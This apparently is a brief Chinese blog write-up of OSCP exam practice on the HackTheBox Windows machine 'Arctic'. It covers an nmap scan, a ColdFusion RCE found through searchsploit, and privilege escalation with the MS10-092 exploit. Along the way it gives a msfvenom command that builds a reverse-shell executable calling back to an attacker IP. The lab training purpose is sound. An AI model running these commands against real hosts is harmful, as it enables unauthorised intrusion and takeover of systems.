OSCP备考_0x43_HackThBox靶机_Windows_arctic

Ethan医生2个月前靶场78

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)

image.png

http://10.129.249.241:8500/CFIDE/

image.png

image.png

image.png

searchsploit ADOBE COLDFUSION

查找看看有没有exp

image.png

发现一个RCE 测试看看

然后反弹SHELL

image.png

提全使用ms10 092

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-092/CVE-2010-3338.wsf

将文件下载下来

同时创建一个反弹shell'

msfvenom -p windows/x64/shellreversetcp LHOST=10.10.16.43 LPORT=7777 -f exe >priv.exe

将这两个都上传到靶机

对了,在上传之前,要修改wsf

将原来的月改为minute ,同时tr后面的跟的定时任务也要指定到咱们priv。exe的路径


回到cmd下

cscript CVE-2010-3338.wsf

image.png


标签: OSCP

相关文章

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

Bankrobbernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.109 (扫描TCP)80存在apache,所以我们要关注p...

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。